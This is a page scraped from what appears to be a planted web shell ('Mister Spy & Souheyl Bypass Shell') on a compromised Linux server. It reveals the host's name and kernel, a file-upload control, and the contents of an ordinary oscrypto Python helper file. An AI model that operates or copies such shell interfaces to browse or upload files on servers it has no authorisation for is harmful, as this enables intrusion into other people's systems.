Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/www/wsgi/www/api/venv/lib64/python3.12/site-packages/oscrypto/_win/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : /var/www/wsgi/www/api/venv/lib64/python3.12/site-packages/oscrypto/_win/_kernel32.py

# coding: utf-8
from __future__ import unicode_literals, division, absolute_import, print_function

from .. import ffi
from ._decode import _try_decode
from .._types import str_cls

if ffi() == 'cffi':
    from ._kernel32_cffi import kernel32, get_error
else:
    from ._kernel32_ctypes import kernel32, get_error


__all__ = [
    'handle_error',
    'kernel32',
]


def handle_error(result):
    """
    Extracts the last Windows error message into a python unicode string

    :param result:
        A function result, 0 or None indicates failure

    :return:
        A unicode string error message
    """

    if result:
        return

    _, error_string = get_error()

    if not isinstance(error_string, str_cls):
        error_string = _try_decode(error_string)

    raise OSError(error_string)

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net